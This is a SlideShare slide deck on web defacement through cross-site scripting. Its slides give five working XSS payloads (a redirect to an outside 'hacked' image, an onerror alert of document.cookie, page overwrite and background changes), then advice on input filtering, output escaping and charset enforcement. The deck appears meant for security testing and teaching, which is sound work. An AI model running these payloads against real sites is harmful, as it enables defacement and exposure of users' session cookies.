Cross Site Scripting - Web Defacement Techniques

8,187 views
7,655 views

Published on

Published in: Technology
1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total views
8,187
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
63
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide

Cross Site Scripting - Web Defacement Techniques

  1. 1. Introduction • Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things when the hacker found the vulnerability in website. • Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
  2. 2. Testing • Test will be entered and captured each time using OWASPs ZAP Proxy. Once this is captured we will the replace the Test with our malicious code in turn bypassing the client-side preventions the web site has in place.
  3. 3. 1 • Redirected to hacked Image out of the App Domain <script>window.location="http://www.theblacktechreport.com/wp content/uploads/2011/01/hacked.jpg";</script>
  4. 4. 2 • Adds a hacked image to the page <img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>
  5. 5. 3 • Cover full page with Hacked - in App Domain <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
  6. 6. 4 • Change background to RED - in App Domain <script>document.body.bgColor="red";</script>
  7. 7. 5 • Set the background to Hacked Image- in App Domain  <script>document.body.background="http://www.theblacktechreport.com/wpcontent/uploads/2011/01/hacked.jpg";</script>
  8. 8. 1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this characters is needed by the application, properly escaping is enough. A non comprehensive list of characters likely to be part of an attack vector is: • • • • • • • • • • • • <> (triangular parenthesis) () (parenthesis) " (quotation mark) & (ampersand sign) ' (single apostrophe) + (plus sign) % (percent sign) = (equals sign) : (colon) ` (forward tick) ; (semicolon) ´ (back tick) 2 Escape all the untrusted output before presenting to the UI. Follow the rules detailed in the next link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_ Cheat_Sheet 3 When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).

×